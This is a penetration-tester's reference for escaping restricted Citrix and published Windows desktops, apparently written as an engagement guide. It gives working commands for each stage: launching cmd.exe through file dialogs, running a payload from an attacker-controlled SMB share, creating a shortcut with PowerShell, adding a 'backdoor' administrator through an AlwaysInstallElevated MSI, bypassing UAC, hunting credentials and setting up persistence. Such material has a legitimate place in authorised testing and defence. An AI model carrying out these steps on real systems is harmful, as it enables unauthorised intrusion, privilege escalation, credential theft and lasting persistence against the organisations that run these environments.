Citrix and Published Desktop Breakout
Many organizations deliver remote access through application and desktop virtualization: Citrix Virtual Apps and Desktops, Microsoft Terminal Services / RemoteApp, AWS AppStream, CyberArk PSM, VMware Horizon, and dedicated kiosks. To limit the impact of a compromised account, the published desktop is locked down, but a restricted desktop can almost always be escaped.
This note covers the general breakout method plus a broad set of techniques so it can serve as an engagement reference, not just a single walked path.
The method has three stages:
- Gain access to a dialog box.
- Exploit the dialog box to achieve command execution.
- Escalate privileges.
In lightly hardened environments there may be a shortcut to cmd.exe in the Start Menu. In a locked-down environment, searching the Start Menu for cmd.exe or powershell.exe returns nothing, and opening C:\Windows\System32 in File Explorer is blocked by policy. Getting a command prompt here is the key milestone: it gives broad control of the operating system and the information needed to escalate.
Obtaining the session
Published desktops launch from a web portal. After login, selecting the desktop downloads a launch file (an .ica file for Citrix, an .rdp file for RemoteApp/Terminal Services), which the client opens to connect to the restricted environment.
Stage 1: harvest a dialog box
Group Policy restricts File Explorer and the shell, not every Win32 dialog. A dialog box is a genuine Explorer window with full filesystem and UNC access. Collect dialog sources from every published application:
- Open, Open File, Save, Save As, Browse, Choose folder.
- Import, Export.
- Print, Print preview, Print to file, printer properties.
- Help, F1, About, and any hyperlink in an error dialog.
- Search, Scan.
Common applications that expose these: MS Paint (File, then Open), Notepad, WordPad, document and image viewers, PDF viewers, browser file dialogs, and any line of business app with a file picker.
From a dialog, entering an absolute path or a UNC path in the File name field (with File type set to All Files) reaches otherwise restricted locations:
\\127.0.0.1\c$\Users\<user>
Stage 2: command execution
Once you have a dialog or any execution primitive, use the easiest available path.
Run a native executable
Type an executable path into the File name field and press Enter:
C:\Windows\System32\cmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Then Shift+Right-click a folder and choose Open command window here if the dialog is a real Explorer window.
Run a binary directly from a network location
Open a UNC or WebDAV path in the dialog and Open an executable in place:
\\10.10.10.10\share\pwn.exe
A minimal launcher:
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}
File association execution
If the extension is associated with an interpreter, opening the file runs code:
.bat,.cmd.vbs,.vbe,.js,.jse,.wsf.hta(mshta.exe).ps1.lnk,.url,.scf.msc,.cpl.msi(also a privilege escalation path under AlwaysInstallElevated)
A one line launcher:
cmd
Save it as evil.bat and run it.
Shortcut modification or creation
Right-click a shortcut, Properties, set Target to C:\Windows\System32\cmd.exe, then run it. To create one:
$s = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:USERPROFILE\Desktop\s.lnk")
$s.TargetPath = "C:\Windows\System32\cmd.exe"
$s.Save()
Protocol and shell handlers
Useful when you can type a URL or path:
mshta:,search-ms:,ms-msdt:,msdt:file://,shell:startup,shell:common startup,shell:AppsFolderms-settings:and Control Panel URIs
Task Scheduler and Control Panel
taskschd.msc can create a task that runs an arbitrary command as the current user. Control Panel (Programs and Features, or an applet) can run an installer.
Alternate file explorers and registry editors
When File Explorer is heavily restricted, portable file managers and registry editors ignore the policy:
- File managers: Explorer++, Q-Dir.
- Registry editors: SmallRegistryEditor, Uberregedit, SimpleRegedit.
These are portable and run without installation, so they are easy to bring in over a share and use to copy files or edit the registry.
Office macros and templates
If Microsoft Office is reachable, macros, DDE, or template injection can run commands. Availability depends on the environment.
File transfer from the restricted session
- SMB share browsed via UNC:
smbserver.py -smb2support share $(pwd)
- WebDAV share (host with wsgidav or similar) opened from the dialog or browser.
- FTP URL opened from the dialog or browser.
- Browser downloads from an HTTP(S) server you control.
- Clipboard where allowed.
Stage 3: escalate privileges
Enumerate with WinPEAS and PowerUp. Two findings are common in published desktops.
AlwaysInstallElevated
Check both hives:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both are 0x1, create and run an MSI that adds an administrator:
Import-Module .\PowerUp.ps1
Write-UserAddMSI
Run UserAdd.msi, create the user in Administrators (the password must meet complexity policy), then:
runas /user:backdoor cmd
UAC bypass
Membership in Administrators is not enough while UAC is active. Accessing C:\Users\Administrator returns Access is denied until you hold an elevated token. Bypass scripts work:
Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep
Other public UAC bypass methods to try (many are automated by UACME): fodhelper, computerdefaults, sdclt, eventvwr, slui, sysprep, and auto-elevating binaries. Confirm elevation with whoami /all or whoami /priv.
Other escalation paths
- Service misconfiguration and unquoted service paths.
- Writable service, scheduled task or startup directories.
- Saved credentials in scripts, config files, and
%APPDATA%. - Kerberos ticket and credential material in the session (see
credential-access,lateral-movement). - Missing DLL on PATH, hijackable by a top directory (see
dll-injection,windows-privesc).
Credential and data hunting
With a shell, look for:
- Scripts and batch files containing credentials or connection strings.
- Config,
.ini,.config,.xml,.jsonfiles with stored secrets. - Browser saved logins and
Credentialsin the Windows Credential Manager. - Unattended install files (
unattend.xml,sysprep.inf). - PowerShell history and
Export-Clixmlfiles.
See credential-access for tooling.
Persistence after a breakout
- A shortcut in the Startup folder or
shell:startup. - A scheduled task that runs your payload.
- A Run key under
HKCU\Software\Microsoft\Windows\CurrentVersion\Run. - A modified DLL on PATH (see
dll-injection).
Systematic breakout checklist (fuzzing an environment)
- Enumerate every published or allowed application and build a dialog inventory.
- In each dialog File name field, test absolute path, UNC path, executable path, protocol URI,
shell:URI, and trailing dots or spaces. - Test every file extension association by dropping a harmless file and opening it.
- Test Start Menu search with partial names.
- Test right-click context menus, including Shift+Right-click variants.
- Test keyboard shortcuts: F1, Ctrl+O, Ctrl+S, Ctrl+P, Alt, Shift+F10.
- Test Print dialogs and Print to file.
- Test Help links and any error dialog links.
- Test the browser: address bar paths and downloads.
- Test writable directories on PATH for exe and DLL hijacking.
- Repeat per application, since restrictions often differ between published apps.
References
- Citrix product documentation: https://docs.citrix.com
- PowerSploit PowerUp: https://github.com/PowerShellMafia/PowerSploit
- UACME (UAC bypass methods): https://github.com/hfiref0x/UACME
- Impacket smbserver: https://github.com/fortra/impacket
- Explorer++: https://explorerplusplus.com
- Q-Dir: https://www.softwareok.com/?seite=Freeware/Q-Dir
- LOLBAS: https://lolbas-project.github.io